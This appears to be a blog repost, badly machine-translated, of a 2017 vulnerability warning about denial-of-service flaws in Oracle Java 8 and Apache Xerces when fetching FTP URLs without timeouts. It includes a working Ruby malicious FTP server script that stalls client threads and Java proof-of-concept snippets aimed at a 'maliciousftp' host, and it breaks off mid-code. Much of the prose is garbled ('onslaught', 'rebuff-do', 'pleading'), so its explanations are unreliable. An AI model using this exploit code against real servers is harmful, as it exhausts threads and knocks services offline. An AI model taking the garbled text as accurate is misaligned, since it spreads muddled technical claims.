Site icon API Security Blog

Oracle Java and the Apache Xerces PDF/Docx Server DDOS vulnerability-vulnerability warning-the black bar safety net

One, flaws summary
Oracle Java JDK/JRE(1.8.0.131 and earlier versions of the package and the Apache Xerces(2.11.0 version, there are two flaws, two flaws were:
The Oracle JDK/JRE and-rebuff-do(DoS)flaws
java. net. URLConnection not apply setConnectTimeout when and-rebuff-do.
Oracle has received the coherent flaws in the Declaration, and assigned a filing tracking number: S0876966 it. Today we have not yet received a coherent patch or way more information.
Second, the flaws in the details
When satisfied with the following premise, the onslaught to the application of these two flaws to do Manager proposal rejected-DOS(Denial of Service, DoS)onslaught of:
Onslaught is able to be one through the core structure of the URL parameter passed to the object do, the URL parameter points to onslaught’s control of the FTP backlog.
Purpose-do application is the presence of flaws in components to obtain the onslaught of the specified capital.
Purpose of the office is able to obtain the application of the FTP URI is the location of the capital.
In this two flaws, the onslaught proposed by the onslaught process is as follows:
1, the onslaught’s force presence of flaws in the purpose of the Office of the controller parse a FTP URL location, The location pointing to onslaught’s control of the FTP backlog.
2, The purpose of the office is to get onslaught to specify the FTP capital.
3, the onslaught’s FTP-do Controller suddenly stop working, leading to purpose-do on the Java process external legacy two threads, which two threads are in infinite expectation of the situation.
4, If the Java process is a single thread process, then the process will frustration further disposal of the rest of the client’s pleading, and can only be accepted from the onslaught of a pleading, the satisfaction rebuff-do premise.
5, If the Java process is a multi-threaded process, then the onslaught can apply different techniques to each and every available process to withdraw a pleading, exhausted all available threads, to the satisfaction rebuff-do premise.
In order to satisfied with the onslaught premise, when the Java client row will fulfill the RETR FTP Decree, onslaught’s control of the FTP backlog is necessary“suddenly”was added. Do end the frustration the correct disposal of such environment, based on the render thread and-rebuff-do signs.
Like: the
require ‘socket’
ftp_server = TCPServer. new 21
Thread. start do
loop do
Thread. start(ftp_server. accept) do |ftp_client|
puts “FTP. New client connected”
ftp_client. puts(“220 ftp-server”)
counter = 0
loop {
req = ftp_client. gets()
break if req. nil?
puts”
if req. the include? “USER”
ftp_client. puts(“331 password”)
else
ftp_client. puts(“230 Waiting data”)
counter = counter + 1
if counter == 6
abort
end
end
}
puts “Aborted…”
end
end
end
loop do
sleep(50000)
end
! [](/Article/UploadPic/2017-9/201796191418380. png? www. myhack58. com)
When the flaws in the premise of satisfaction, the DoS will lead to the purpose-do with FTP do the 192.168.234.134 between convergence in a CLOSE_WAIT Status, The make-do-side Java thread is in a stalling condition.
! [](/Article/UploadPic/2017-9/201796191418530. png? www. myhack58. com)
Third, the Oracle JDK/JRE and-rebuff-do.
The presence of flaws in the function is:
java. io. InputStream
java. xml. ws. Service
javax. xml. validation. Schema
javax. xml. JAXBContext
java. net. JarURLConnection not apply setConnectionTimeout and the setReadTimeout function when
javax. imageio. ImageIO
Javax. swing. ImageIcon
javax. swing. text. html. StyleSheet
3.1 java. io. InputStream PoC code
import java. io. InputStream;
import java. net. URL;
public class RandomAccess {
public static void main(String[] args) {
try {
//url = new URL (“ftp://maliciousftp:2121/test.xml”);
URL url = new URL(“ftp://maliciousftp:2121/test.xml”);
InputStream inputStream = url. openStream();
inputStream. read();
//urlc. setReadTimeout(5000);
//urlc. setConnectTimeout(5000); //
} catch (Exception e) {
e. printStackTrace();
}
}
}
3.2 the javax. xml. ws. Service PoC code
import java. net. MalformedURLException;
import java. net. URL;
import javax. xml. namespace. QName;
import javax. xml. ws. Service;
public class CreateService {
public static void main(String[] args) {
String wsdlURL = “ftp://maliciousftp:2121/test?wsdl”;
String namespace = “https://foo.bar.com/webservice”;
String serviceName = “SomeService”;
QName serviceQN = new QName(namespace, serviceName);
try {
Service service = Service. create(new URL(wsdlURL), serviceQN);

**[1] [[2]]() [[3]]() [next]()**Read More

Exit mobile version